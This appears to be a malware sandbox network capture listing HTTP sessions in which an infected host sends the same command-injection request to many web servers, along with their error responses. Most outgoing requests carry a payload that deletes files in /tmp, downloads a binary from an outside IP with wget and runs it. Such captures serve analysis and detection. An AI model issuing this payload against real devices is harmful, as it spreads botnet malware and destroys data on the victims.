                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 61 6e 61 6e 6d 61 6c 65 7a 2e 6f 72 67 2e 65 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Raspbian) Server at sananmalez.org.es Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          230192.168.2.235185223.231.150.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.125010967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.445928097 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:21:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          231192.168.2.234412618.167.130.6480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.131709099 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          232192.168.2.234220846.101.108.16580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.183226109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.429023027 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          233192.168.2.234108887.123.31.16580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.186616898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.437028885 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          234192.168.2.2340470202.238.204.21080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.201457977 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          235192.168.2.2336010104.113.198.15880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.210333109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.483997107 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 33 34 36 64 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 36 34 26 23 34 36 3b 32 34 37 32 33 33 39 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5d346d68&#46;1704173064&#46;24723399</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          236192.168.2.233878618.142.2.15980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.307204962 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.642637968 CET78INHTTP/1.1 400 BAD_REQUEST
                                                          Content-Length: 0
                                                          Connection: Close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          237192.168.2.23489882.182.153.6280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.372961998 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.715166092 CET443INHTTP/1.1 403 Forbidden
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 337
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 45 31 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTE1</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          238192.168.2.233544445.63.78.7080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.766885042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          239192.168.2.2349976104.230.152.22580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.820851088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.997770071 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:25.876441002 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:26.930357933 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:29.037997007 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:33.245991945 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:41.677956104 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          240192.168.2.2351014172.121.20.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.984846115 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:25.148833990 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          241192.168.2.235906023.231.34.9080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.279280901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.400278091 CET413INHTTP/1.0 407 Proxy Authentication Required
                                                          Proxy-Authenticate: Basic realm="login"
                                                          Connection: close
                                                          Content-type: text/html; charset=utf-8
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          242192.168.2.2348982205.186.128.880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.336199045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.514081001 CET354INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          243192.168.2.235986234.216.109.880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.341329098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          244192.168.2.233897234.107.164.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.400912046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.522589922 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:24:27 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          245192.168.2.2336874147.161.173.480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.401967049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.649270058 CET279INHTTP/1.0 400 Bad request
                                                          Server: Zscaler/6.2
                                                          Content-Type: text/html
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          246192.168.2.2348036191.82.53.4380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.438039064 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.720849037 CET424INData Raw: 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30
                                                          Data Ascii: 157.90.250.90/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Tue, 02 Jan 2024 05:24:27 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          247192.168.2.2337718157.70.251.2380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.439650059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:28.876701117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:30.572432041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:34.187927008 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.098941088 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:54.665059090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:23.588968039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          248192.168.2.236086670.121.13.480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.470721006 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.607001066 CET500INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:24:27 GMT
                                                          Server: HTTP Server
